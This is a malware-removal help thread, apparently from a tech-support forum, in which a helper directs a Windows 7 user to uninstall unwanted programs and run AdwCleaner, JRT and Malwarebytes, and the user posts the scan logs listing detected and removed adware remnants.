Physical Sector Size: 512
Drive: 1, DevicePointer: 0xfffffa80048ce620, DeviceName: \Device\Harddisk1\DR1\, DriverName: \Driver\Disk\
--------- Disk Stack ------
DevicePointer: 0xfffffa800490f040, DeviceName: Unknown, DriverName: \Driver\partmgr\
DevicePointer: 0xfffffa80048ce620, DeviceName: \Device\Harddisk1\DR1\, DriverName: \Driver\Disk\
DevicePointer: 0xfffffa80046a4520, DeviceName: Unknown, DriverName: \Driver\ACPI\
DevicePointer: 0xfffffa80046a7060, DeviceName: \Device\Ide\IdeDeviceP1T0L0-1\, DriverName: \Driver\atapi\
------------ End ----------
Alternate DeviceName: \Device\Harddisk1\DR1\, DriverName: \Driver\Disk\
Upper DeviceData: 0xfffff8a0154850e0, 0xfffffa80048ce620, 0xfffffa800489d790
Lower DeviceData: 0xfffff8a0121cce00, 0xfffffa80046a7060, 0xfffffa8006e63a50
Drive 1
Scanning MBR on drive 1...
Inspecting partition table:
This drive is a GPT Drive.
MBR Signature: 55AA
Disk Signature: 84AEB39B

GPT Protective MBR Partition information:

    Partition 0 type is EFI-GPT (0xee)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 1  Numsec = 4294967295

    Partition 1 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0  Numsec = 0

    Partition 2 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0  Numsec = 0

    Partition 3 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0  Numsec = 0

GPT Partition information:

    GPT Header Signature 4546492050415254
    GPT Header Revision 65536 Size 92 CRC 675767371
    GPT Header CurrentLba = 1 BackupLba 1953525167
    GPT Header FirstUsableLba 34  LastUsableLba 1953525134
    GPT Header Guid a3bb2c78-e8d1-47eb-8b1-27be344f751f
    GPT Header Contains 128 partition entries starting at LBA 2
    GPT Header Partition entry size = 128

    Backup GPT header Signature 4546492050415254
    Backup GPT header Revision 65536 Size 92 CRC 675767371
    Backup GPT header CurrentLba = 1953525167 BackupLba 1
    Backup GPT header FirstUsableLba 34  LastUsableLba 1953525134
    Backup GPT header Guid a3bb2c78-e8d1-47eb-8b1-27be344f751f
    Backup GPT header Contains 128 partition entries starting at LBA 1953525135
    Backup GPT header Partition entry size = 128

    Partition 0 Type ebd0a0a2-b9e5-4433-87c0-68b6b72699c7
    Partition ID 1711e3e0-22c7-fdc2-6787-03bbc7fe42
    FirstLBA 40  Last LBA 1953525133
    Attributes 0
    Partition Name                                     

Disk Size: 1000204886016 bytes
Sector size: 512 bytes

Done!
Physical Sector Size: 0
Drive: 2, DevicePointer: 0xfffffa8006248790, DeviceName: \Device\Harddisk2\DR2\, DriverName: \Driver\Disk\
--------- Disk Stack ------
DevicePointer: 0xfffffa8004e7d040, DeviceName: Unknown, DriverName: \Driver\partmgr\
DevicePointer: 0xfffffa8006248790, DeviceName: \Device\Harddisk2\DR2\, DriverName: \Driver\Disk\
DevicePointer: 0xfffffa8004e876f0, DeviceName: \Device\0000008a\, DriverName: \Driver\USBSTOR\
------------ End ----------
Physical Sector Size: 0
Drive: 3, DevicePointer: 0xfffffa800638b060, DeviceName: \Device\Harddisk3\DR3\, DriverName: \Driver\Disk\
--------- Disk Stack ------
DevicePointer: 0xfffffa800638bb90, DeviceName: Unknown, DriverName: \Driver\partmgr\
DevicePointer: 0xfffffa800638b060, DeviceName: \Device\Harddisk3\DR3\, DriverName: \Driver\Disk\
DevicePointer: 0xfffffa80063801f0, DeviceName: \Device\000000aa\, DriverName: \Driver\USBSTOR\
------------ End ----------
File "C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-72E9D22B0E2BB7AB3D9F12899FFFF8F1FA873CE3.bin.79" is compressed (flags = 1)
File "C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-72E9D22B0E2BB7AB3D9F12899FFFF8F1FA873CE3.bin.79" is compressed (flags = 1)
File "C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-72E9D22B0E2BB7AB3D9F12899FFFF8F1FA873CE3.bin.79" is compressed (flags = 1)
File "C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-72E9D22B0E2BB7AB3D9F12899FFFF8F1FA873CE3.bin.79" is compressed (flags = 1)
File "C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-72E9D22B0E2BB7AB3D9F12899FFFF8F1FA873CE3.bin.79" is compressed (flags = 1)
File "C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-72E9D22B0E2BB7AB3D9F12899FFFF8F1FA873CE3.bin.79" is compressed (flags = 1)
File "C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-72E9D22B0E2BB7AB3D9F12899FFFF8F1FA873CE3.bin.79" is compressed (flags = 1)
File "C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-72E9D22B0E2BB7AB3D9F12899FFFF8F1FA873CE3.bin.79" is compressed (flags = 1)
File "C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-72E9D22B0E2BB7AB3D9F12899FFFF8F1FA873CE3.bin.79" is compressed (flags = 1)
File "C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-72E9D22B0E2BB7AB3D9F12899FFFF8F1FA873CE3.bin.79" is compressed (flags = 1)
File "C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-72E9D22B0E2BB7AB3D9F12899FFFF8F1FA873CE3.bin.79" is compressed (flags = 1)
File "C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-72E9D22B0E2BB7AB3D9F12899FFFF8F1FA873CE3.bin.79" is compressed (flags = 1)
File "C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-72E9D22B0E2BB7AB3D9F12899FFFF8F1FA873CE3.bin.79" is compressed (flags = 1)
File "C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-72E9D22B0E2BB7AB3D9F12899FFFF8F1FA873CE3.bin.7C" is compressed (flags = 1)
File "C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-72E9D22B0E2BB7AB3D9F12899FFFF8F1FA873CE3.bin.83" is compressed (flags = 1)
Scan finished
=======================================


Removal queue found; removal started
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-0-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\VBR-0-0-2048-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\VBR-0-1-206848-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-0-r.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-1-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-1-r.mbam...
Removal finished

------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

 

RogueKiller V12.7.3.0 (x64) [Oct 17 2016] (Free) by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : http://forum.adlice.com
Website : http://www.adlice.com/download/roguekiller/
Blog : http://www.adlice.com

Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits version
Started in : Normal mode
User : Kevin [Administrator]
Started from : C:\Users\Kevin\Desktop\virusfix\RogueKillerX64.exe
Mode : Scan -- Date : 10/23/2016 02:20:19 (Duration : 00:21:06)

¤¤¤ Processes : 0 ¤¤¤

¤¤¤ Registry : 69 ¤¤¤
[PUP] (X64) HKEY_CLASSES_ROOT\CLSID\{1A53AD8B-D0B9-4E7F-88E4-50C07A65F2DC} (C:\Windows\COUPON~2.OCX) -> Found
[PUP] (X64) HKEY_CLASSES_ROOT\CLSID\{A85A5E6A-DE2C-4F4E-99DC-F469DF5A0EEC} (C:\Windows\COUPON~2.OCX) -> Found
[PUP] (X64) HKEY_CLASSES_ROOT\dnUpdate -> Found
[PUP] (X86) HKEY_LOCAL_MACHINE\Software\W3i -> Found
[PUP] (X64) HKEY_USERS\S-1-5-21-1764878690-1872824068-2637823629-1001\Software\StartSearch -> Found
[PUP] (X64) HKEY_USERS\S-1-5-21-1764878690-1872824068-2637823629-1001\Software\YahooPartnerToolbar -> Found
[PUP] (X86) HKEY_USERS\S-1-5-21-1764878690-1872824068-2637823629-1001\Software\StartSearch -> Found
[PUP] (X86) HKEY_USERS\S-1-5-21-1764878690-1872824068-2637823629-1001\Software\YahooPartnerToolbar -> Found
[PUP] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\SoftwareUpdUtility -> Found
[PUM.Policies] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System | ConsentPromptBehaviorAdmin : 0  -> Found
[PUM.Policies] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System | ConsentPromptBehaviorAdmin : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_TrackProgs : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowUser : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowControlPanel : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowHelp : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyComputer : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyDocs : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyMusic : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyPics : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowPrinters : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowRecentDocs : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowRun : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowSearch : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowSetProgramAccessAndDefaults : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_TrackProgs : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowUser : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowControlPanel : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowHelp : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyComputer : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyDocs : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyMusic : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyPics : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowPrinters : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowRecentDocs : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowRun : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowSearch : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowSetProgramAccessAndDefaults : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-1764878690-1872824068-2637823629-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowDownloads : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-1764878690-1872824068-2637823629-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowDownloads : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_TrackProgs : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowUser : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowControlPanel : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowHelp : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyComputer : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyDocs : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyMusic : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyPics : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowPrinters : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowRecentDocs : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowRun : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowSearch : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowSetProgramAccessAndDefaults : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_TrackProgs : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowUser : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowControlPanel : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowHelp : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyComputer : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyDocs : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyMusic : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyPics : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowPrinters : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowRecentDocs : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowRun : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowSearch : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowSetProgramAccessAndDefaults : 0  -> Found

¤¤¤ Tasks : 0 ¤¤¤

¤¤¤ Files : 3 ¤¤¤
[PUP][Folder] C:\Users\Kevin\AppData\Roaming\Easeware -> Found
[PUP][Folder] C:\Users\Kevin\AppData\Local\iWin -> Found
[PUP][Folder] C:\Program Files (x86)\Coupons -> Found

¤¤¤ WMI : 0 ¤¤¤

¤¤¤ Hosts File : 0 ¤¤¤

¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤

¤¤¤ Web browsers : 1 ¤¤¤
[PUM.HomePage][FIREFX:Config] 0qifstuh.default : user_pref("browser.startup.homepage", "http://www.gbatemp.net"); -> Found

¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0:  +++++
--- User ---
[MBR] 2ade244ac62fd861cb6a805d70a3cda4
[BSP] 06d6b80dccd3339c8874cd082b67ba42 : Windows Vista/7/8|VT.Unknown MBR Code
Partition table:
0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 100 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 206848 | Size: 476836 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
User = LL1 ... OK
User = LL2 ... OK

+++++ PhysicalDrive1: ST1000DM003-1ER162 ATA Device +++++
--- User ---
[MBR] 0667f27ea431bc9973a1d4bc0357e481
[BSP] 25bce0793791fbbb0b12996278839f5e : Empty MBR Code
Partition table:
0 -  | Offset (sectors): 40 | Size: 953869 MB
User = LL1 ... OK
User = LL2 ... OK

+++++ PhysicalDrive2: HP Photosmart Premi USB Device +++++
Error reading User MBR! ([15] The device is not ready. )
Error reading LL1 MBR! NOT VALID!
Error reading LL2 MBR! ([32] The request is not supported. )

+++++ PhysicalDrive3: Generic- Multi-Card USB Device +++++
Error reading User MBR! ([15] The device is not ready. )
Error reading LL1 MBR! NOT VALID!
Error reading LL2 MBR! ([32] The request is not supported. )



#8 TsVk!

TsVk!

    penguin farmer


  • Members
  • 6,234 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:The Antipodes
  • Local time:03:03 AM

Posted 24 October 2016 - 05:06 PM

Hi jumpman17

 

Looking better.

 

Next...

 

Please Uninstall these programs if you did not intentionally install or do not use

  • Coupon Printer for Windows
  • Download Updater (AOL Inc.)

then...

 

29bgcgg.jpg  Please download AdwCleaner and save to your Desktop.

  • Right click and "Run as Administrator"
  • Click on the Scan button.
  • After the scan has finished, click Clean and ok the reboot
  • When complete, your machine will restart and a log file will appear
  • A copy of all logfiles are saved in the C:\AdwCleaner folder which was created when running the tool.

2zh1g08.jpg  Please download Junkware Removal Tool to your desktop.

  • Shut down your protection software now to avoid potential conflicts.
  • Right click and "Run as Administrator".
  • The tool will open and start scanning your system.
  • On completion a log will open, note the saved JRT.txt on your desktop to copy into your reply

malwarebytes_icon_mini_by_linux_rules-d9  Please download and install MalwareBytes Anti-Malware.

  • Run the program. 
  • Click Scan Now.
  • If threats are detected, click Remove Selected. If you are prompted to reboot, click Yes.
  • Upon completion of the scan (or after the reboot), click the HISTORY tab.
  • Click Application Logs, followed by the first Scan Log.
  • Click Export, followed by Copy to ClipboardPaste the log in your next reply.

Please include in your reply

  • ADWCleaner log
  • JRT log
  • MBAM log

TsVk!



#9 jumpman17

jumpman17
  • Topic Starter

  • Members
  • 25 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:12:03 PM

Posted 24 October 2016 - 09:29 PM

I've uninstalled the 2 programs and here are the requested logs.

 

# AdwCleaner v6.030 - Logfile created 24/10/2016 at 21:55:31
# Updated on 19/10/2016 by Malwarebytes
# Database : 2016-10-23.2 [Server]
# Operating System : Windows 7 Ultimate Service Pack 1 (X64)
# Username : Kevin - KEVIN-PC
# Running from : C:\Users\Kevin\Desktop\virusfix\AdwCleaner.exe
# Mode: Clean
# Support : hxxps://www.malwarebytes.com/support



***** [ Services ] *****



***** [ Folders ] *****

[-] Folder deleted: C:\Users\Kevin\AppData\Local\iWin
[-] Folder deleted: C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\FoxTab


***** [ Files ] *****



***** [ DLL ] *****



***** [ WMI ] *****



***** [ Shortcuts ] *****



***** [ Scheduled Tasks ] *****



***** [ Registry ] *****

[-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\TsActiveXClient
[#] Key deleted on reboot: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\TsActiveXClient_is1
[-] Key deleted: HKLM\SOFTWARE\Classes\AppID\{3A188115-B81B-48F2-A958-F974C8F3F309}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{78CE34FD-F6D4-4866-B79C-A37268D06A04}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{80904944-C726-4C7D-A452-3FFF2A882095}
[-] Key deleted: HKLM\SOFTWARE\Classes\TypeLib\{2D9B1B31-D034-4738-8F6E-40F0AFCC742C}
[-] Key deleted: HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{7854F00C-DC77-477E-A10E-603F48442D3B}
[-] Key deleted: HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{9522B3FB-7A2B-4646-8AF6-36E7F593073C}
[-] Key deleted: HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{9522B3FB-7A2B-4646-8AF6-36E7F593073C}
[-] Key deleted: HKU\S-1-5-21-1764878690-1872824068-2637823629-1001\Software\StartSearch
[-] Key deleted: HKU\S-1-5-21-1764878690-1872824068-2637823629-1001\Software\YahooPartnerToolbar
[#] Key deleted on reboot: HKCU\Software\StartSearch
[#] Key deleted on reboot: HKCU\Software\YahooPartnerToolbar
[-] Key deleted: HKLM\SOFTWARE\W3I
[#] Key deleted on reboot: [x64] HKCU\Software\StartSearch
[#] Key deleted on reboot: [x64] HKCU\Software\YahooPartnerToolbar
[-] Key deleted: HKLM\SOFTWARE\Classes\AppID\SMBarBroker.EXE
[-] Key deleted: HKLM\SOFTWARE\Google\Chrome\Extensions\pacgpkgadgmibnhpdidcnfafllnmeomc


***** [ Web browsers ] *****

[-] Chrome preferences cleaned: "extensions.wajam.affiliate_id" -  "5927"
[-] Chrome preferences cleaned: "extensions.wajam.firstrun" -  "false"
[-] Chrome preferences cleaned: "extensions.wajam.log_send_info" -  "false"
[-] Chrome preferences cleaned:
[-] Chrome preferences cleaned: "extensions.wajam.no_trace" -  "false"
[-] Chrome preferences cleaned: "extensions.wajam.server_current_mapping_version" -  "0.21087"
[-] Chrome preferences cleaned: "extensions.wajam.trace_log" -  "1372300443672 - processDOMLoad - mappingListJsonString is null, request mapping\n1372300444061 - onFlagInfoReceived - JSON Received: {\"unique_id\":\"78C7C7C85644A3EC0BBCE0DAAF70B809\",\"urls_mapping_version\":\"0.21087\",\"send_debug_info\":false}\n1372300444061 - onFlagInfoReceived - Server mapping version: 0.21087\n1372300444061 - onFlagInfoReceived - No client-side server mapping version, don't update\n1372300444061 - onFlagInfoReceived - Saving server mapping version\n1372300444061 - onFlagInfoReceived - No user current mapping version specified, set to '0'\n1372300444062 - onFlagInfoReceived - Unique ID saved\n"
[-] Chrome preferences cleaned: "extensions.wajam.unique_id" -  "78C7C7C85644A3EC0BBCE0DAAF70B809"
[-] Chrome preferences cleaned: "extensions.wajam.user_current_mapping_version" -  "0"
[-] Chrome preferences cleaned: "extensions.wajam.version" -  "1.26"
[-] [C:\Users\Kevin\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: aol.com
[-] [C:\Users\Kevin\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: ask.com


*************************

:: "Tracing" keys deleted
:: Winsock settings cleared

*************************

C:\AdwCleaner\AdwCleaner[C0].txt - [4033 Bytes] - [24/10/2016 21:55:31]
C:\AdwCleaner\AdwCleaner[S0].txt - [4421 Bytes] - [24/10/2016 21:53:47]

########## EOF - C:\AdwCleaner\AdwCleaner[C0].txt - [4179 Bytes] ##########
 

------------------------------------------------------------------------------------------------------------------------------------------------------------------------

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.0.9 (09.30.2016)
Operating System: Windows 7 Ultimate x64
Ran by Kevin (Administrator) on Mon 10/24/2016 at 22:00:12.02
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




File System: 9

Successfully deleted: C:\Users\Kevin\AppData\Local\cre (Folder)
Successfully deleted: C:\Users\Kevin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2E1GZBEI (Temporary Internet Files Folder)
Successfully deleted: C:\Users\Kevin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NWBTTB0B (Temporary Internet Files Folder)
Successfully deleted: C:\Users\Kevin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PMW5IUZE (Temporary Internet Files Folder)
Successfully deleted: C:\Users\Kevin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\YHWRVAQW (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2E1GZBEI (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NWBTTB0B (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PMW5IUZE (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\YHWRVAQW (Temporary Internet Files Folder)

Deleted the following from C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\prefs.js
user_pref(extensions.wajam.affiliate_id, 5927);



Registry: 1

Successfully deleted: HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Search\\SearchAssistant (Registry Value)




~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Mon 10/24/2016 at 22:03:35.24
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
------------------------------------------------------------------------------------------------------------------------------------------------------------------------

 

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 10/24/2016
Scan Time: 10:06 PM
Logfile:
Administrator: Yes

Version: 2.2.1.1043
Malware Database: v2016.10.25.04
Rootkit Database: v2016.09.26.02
License: Premium
Malware Protection: Enabled
Malicious Website Protection: Disabled
Self-protection: Disabled

OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: Kevin

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 365369
Time Elapsed: 17 min, 49 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Deep Rootkit Scan: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

